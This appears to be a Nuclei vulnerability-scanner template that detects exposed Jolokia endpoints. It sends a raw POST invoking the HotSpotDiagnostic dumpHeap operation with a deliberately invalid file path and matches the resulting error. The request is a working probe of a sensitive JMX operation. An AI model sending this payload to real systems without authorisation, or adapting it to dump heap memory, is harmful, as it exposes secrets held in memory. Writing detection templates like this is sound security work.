id: jolokia-heap-info-disclosure

info:
  name: Jolokia Java Heap Information Disclosure
  author: milo2012
  severity: info
  metadata:
    max-request: 1
  tags: jolokia,disclosure,java

http:
  - raw:
      - |
        POST /jolokia/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        {
           "type":"EXEC",
           "mbean":"com.sun.management:type=HotSpotDiagnostic",
           "operation":"dumpHeap",
           "arguments":[
              "/tmp1234/test1.hprof",
              0
           ]
        }

    matchers:
      - type: word
        words:
          - 'stacktrace":"java.io.IOException: No such file or directory'
        part: body

# digest: 4b0a00483046022100985f2a90699aad1afbc847de3b25248de89a27e7acfdffd679273904893ece72022100dfd178a372da3a28fae73e84630e9dbef40c26a64ef275108bac16a3c5ea9e1b:922c64590222798bb761d5b6d8e72950